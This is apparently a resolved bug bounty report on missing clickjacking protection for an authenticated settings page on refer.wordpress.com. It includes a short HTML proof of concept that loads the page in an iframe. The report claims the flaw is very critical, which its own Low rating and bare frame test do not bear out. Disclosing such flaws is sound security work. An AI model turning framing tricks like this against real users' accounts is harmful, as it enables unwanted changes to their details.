Modify account details by exploiting clickjacking vulnerability on refer.wordpress.com
Low
Vulnerability Details
## Summary:
I have found that there is no protection against clickjacking on refer.wordpress.com, so an attacker can exploit it to change users' details. This clickjacking is on authenticated pages, so it is a very critical vulnerability.
## Steps To Reproduce:
1. Create an HTML file with the following content
```
<html>
<head>
<title>Clickjacking</title>
</head>
<body>
<iframe src="https://refer.wordpress.com/affiliate-network/campaign-settings/"></iframe>
</body>
</html>
```
1. Open the HTML file created above in a browser, and
1. You will find that your website is loaded in the browser without any protection such as Iframe
## Supporting Material/References:
* {F670239}
## Impact
Modify account details by exploiting a clickjacking vulnerability
Report Stats
- Report ID: 765355
- State: Closed
- Substate: resolved
- Upvotes: 12